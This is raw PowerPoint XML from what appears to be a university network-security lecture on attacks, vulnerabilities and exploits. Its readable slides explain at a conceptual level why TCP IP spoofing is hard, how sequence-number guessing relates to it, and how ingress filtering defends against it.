  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="406400" indent="-177800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="863600" indent="-254000" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1320800" indent="-406400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1778000" indent="-596900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2235200" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2692400" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3149600" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3606800" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="36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Packet_(information_technology)"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image" Target="../media/image2.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11.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject10.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject13.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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oleObject" Target="../embeddings/oleObject16.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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oleObject" Target="../embeddings/oleObject17.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject20.bin"/><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oleObject" Target="../embeddings/oleObject19.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject18.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.wmf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject22.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7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject25.bin"/><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oleObject" Target="../embeddings/oleObject24.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.wmf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject28.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject23.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject27.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notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject31.bin"/><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oleObject" Target="../embeddings/oleObject30.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.wmf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject34.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject29.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject33.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36.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject35.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oleObject" Target="../embeddings/oleObject38.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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oleObject" Target="../embeddings/oleObject40.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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en.wikipedia.org/wiki/File:IDN_homograph_attack_1.P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www.cirt.ne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image" Target="../media/image2.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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29.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject41.bin"/></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oleObject" Target="../embeddings/oleObject4.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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075" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12749213" y="9461500"/>
            <a:ext cx="230187" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="40639" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2133600"/>
            <a:ext cx="11703050" cy="1625600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1270000" y="5029200"/>
            <a:ext cx="10464800" cy="4724400"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS 6823 – Lecture 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacks, Vulnerabilities and Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phillip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pmak@nyu.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"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bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1066800"/>
            <a:ext cx="11703050" cy="8286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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP spoofing with TCP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Can an attacker make a TCP connection to server with a spoofed IP address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Not easy: SYN-ACK and any subsequent packets sent to spoofed address. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>If attacker can guess initial sequence number, can attempt to send commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Send ACK with spoofed IP and correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> #, say, one second after SYN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>But TCP uses random initial sequence numbers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{300B004E-6006-4470-BC20-3E02EDFE0F0B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5061028E-D8D8-4794-A2ED-790CE1CB035E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11053763" cy="16256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Defense: Ingress filtering: access ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="101600" y="5387975"/>
            <a:ext cx="5419725" cy="2579688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="487363" indent="-487363">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
